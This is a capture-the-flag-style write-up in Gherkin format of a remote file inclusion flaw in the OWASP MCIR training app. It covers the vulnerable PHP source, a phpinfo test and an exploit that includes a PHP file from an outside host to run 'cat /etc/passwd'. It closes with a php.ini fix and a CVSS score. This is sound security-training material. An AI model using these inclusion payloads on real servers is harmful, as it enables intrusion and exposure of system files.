## Version 1.4.1
## language: en

Feature:
  TOE:
    MCIR: Magical Code Injection Rainbow
  Category:
    Shell Command Injection
  Location:
    rfidk/challenges/challenge0.php - Injection String (field)
  CWE:
    CWE-98: PHP Remote File Inclusion
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Show the phpinfo() page
  Recommendation:
    Disable remote file inclusion in php.ini

  Background:
  Hacker's software:
    |     <Software name>      |    <Version>    |
    |          OWASP           |       1.6       |
    |   VMWare Workstation 15  |     15.0.2      |
    |     Firefox Quantum      |     65.0.2      |
  TOE information:
    Given I'm running OWASP on VMWare
    And I'm accessing the MCIR pages through my Firefox browser
    And I enter a php page that takes a string
    And passes it to the file_get_contents function

  Scenario: Normal use case
  The site allows the user to enter the name of a local file to display
    Given I access the page rfidk/challenges/challenge0.php
    And I enter the string "spanish_poem_nocturno.txt"
    And I click the Inject! button
    Then the poem is shown
    And I can see [evidence](normal-use-case.png)

  Scenario: Static Detection
  There is no validation on the input before passed to file_get_contents()
    When I look at the source code
    And I check the code that prepares the input
    """
    58  switch($_REQUEST['location']){
    59    case 'filename':
    60        $uri = str_replace('date.php', $_REQUEST['inject_string'],
                     'pages/date.php');
    61        break;
    ...
    79  $tempfilename = tempnam('tempfiles','temp');
    80  $tempfile = fopen($tempfilename,'w');
    81  fwrite($tempfile,file_get_contents($uri));
    82  fclose($tempfile);
    83  $output = include($tempfilename);
    84  unlink($tempfilename);
    """
    Then I notice there is no validation on the input string

  Scenario: Dynamic detection
  The input of the Inject! field takes external links as parameters
    Given I have uploaded a file with these lines to a personal server
    """
    1  <?php
    2    phpinfo();
    3  ?>
    """
    And I enter the following link into the Inject! field
    """
    https://cookiesgather.000webhostapp.com/rfi.txt
    """
    And I click the Inject! button
    Then I can see the php configuration of the target server
    And it can be seen in [evidence](phpinfo.png)
    And I conclude the application is vulnerable to remote file inclusion

  Scenario: Exploitation
  Upload a php file that displays the contents of /etc/passwd
    Given I have uploaded a file with these lines to a personal server
    """
    1  <?php
    2    echo system("cat /etc/passwd");
    3  ?>
    """
    And I enter the following link into the Inject! field
    """
    https://cookiesgather.000webhostapp.com/shell.php
    """
    And I click the Inject! button
    Then the contents of /etc/passwd are shown
    And it can be seen in [evidence](etc-passwd.png)

  Scenario: Remediation
  Disable external files inclusion
    Given I have added the following lines to the server's php.ini file
    """
    allow_url_fopen = off
    allow_url_include = off
    """
    Then I can prevent the injection of the code shown above
    Given I re-run my exploit
    Then I get an empty response
    And it can be seen in [evidence](empty-response.png)

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (Critical) - CR:L/IR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-03-26
